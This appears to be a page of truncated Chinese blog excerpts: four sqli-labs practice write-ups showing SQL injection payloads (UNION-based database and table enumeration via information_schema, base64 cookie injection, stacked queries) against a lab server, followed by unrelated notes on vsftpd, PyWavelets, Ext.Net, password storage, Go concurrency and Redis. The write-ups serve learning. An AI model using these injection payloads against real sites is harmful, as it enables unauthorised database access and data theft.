续上,开门见山 暴库: http://43.247.91.228:84/Less-54/?id=-1' union select 1,2,database() --+ challenges 爆表: http://43.247.91.228:84/Less-54/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+ VYKE…

续上,开门见山 Less-21 Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入) 登录后页面 圈出来的地方显然是base64加密过的,解码得到:admin,就是刚才登陆的uname,所以猜测:本题在cookie处加密了字符串, 接下来构造paylaod进行测试 看到红圈处的提示,所以应该构造 ') 这种的 这里就不演示爆行数了,上一题已经做过了. 经过我多次测试,--+在此处不好用,需要使用#来注释. 爆…

开门见山 Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) ·  方法一:手工UNION联合查询注入 输入单引号,页面报错, 注意 id=非正确值 爆库payload http://43.247.91.228:84/Less-1?id=-1' union select 1,2,3 --+ http://43.247.91.228:84/Less-1?id=-1' union select 1,2,databas…

续上,开门见山 堆叠注入,实际上就构成了两条SQL语句 http://43.247.91.228:84/Less-38/?id=1' union select 1,2,3 --+    //未报错 http://43.247.91.228:84/Less-38/?id=1' union select 1,2,3,4 --+     //报错 查询出有三个字段, 使用堆叠注入, 暴位置 http://43.247.91.228:84/Less-38/?id=-1' union select 1,2…

感谢 linuxconfig.org 上的这篇英文教程 FTP用于访问和传输本地网络上的文件,通过安装 VSFTPD 软件,打开热点,配置相关信息后即能够启动并运行FTP服务器了. 1. 安装和配置VSFTPD 在终端中输入指令以安装 VSFTPD $ sudo apt-get install vsftpd 2. 设置 FTP 用户账号 首先我们对原配置文件 vsftpd.conf 进行备份,避免待会的操作中出错. $ sudo mv /etc/vsftpd.conf /etc/vsftpd.c…

[Python ]小波变化库——Pywalvets 学习笔记 2017年03月20日 14:04:35 SNII_629 阅读数:24776 标签: python库pywavelets小波变换 更多 个人分类: 机器学习  https://blog.csdn.net/nanbei2463776506/article/details/64124841 相关资料 PyWavelets 官网: https://pywavelets.readthedocs.io/en/latest/ref/index.…

Ext.Net学习笔记20:Ext.Net FormPanel 复杂用法 在上一篇笔记中我们介绍了Ext.Net的简单用法,并创建了一个简单的登录表单.今天我们将看一下如何更好是使用FormPanel,包括使用字段默认值.Checkbox Grouping和Radio Button Grouping等. 为FormPanel设置默认值 在Form中设置FieldDefaults标签可以设置字段属性的默认值.来看一下我们的用法: <FieldDefaults LabelWidth="60&q…

目标:恢复或重置密码 反模式:使用明文存储密码 1.存储密码 使用明文存储密码或者在网络上传递密码是不安全的. 如果攻击者截取到你用来插入(或者修改)密码的sql语句,就可以获得密码.     黑客获取密码的方式有很多种: (1)在客户端和服务器端数据库交互的网络线路上接货数据包.比如使用Wireshark黑客软件. (2)在数据库服务器上搜索SQL的查询日志. (3)从服务器或者备份介质上读取数据库备份文件内的数据. 2.验证密码:同上. 3.在Email中发送密码:Email的收发都需要经由…

golang学习笔记20 一道考察对并发多协程操作一个共享变量的面试题 下面这个程序运行的能num结果是什么? package main import ( "fmt" "sync" ) var num int64 = 0 var max = 10000 var wg sync.WaitGroup func main() { wg.Add(2) go addNum() go addNum() wg.Wait() fmt.Printf("num=%d \n&q…

本篇基于redis 4.0.11版本,学习列表(list)和集合(set)和有序集合(sorted set)相关命令. 列表按照插入顺序排序,可重复,可以添加一个元素到列表的头部(左边)或者尾部(右边). 集合是 String 类型的无序集合,不能出现重复的数据. 有序集合和集合一样也是string类型元素的集合,且不允许重复的成员,但分数(score)却可以重复.不同的是每个元素都会关联一个double类型的分数.redis正是通过分数权重来为集合中的成员进行从小到大的排序. 列表相关命令:…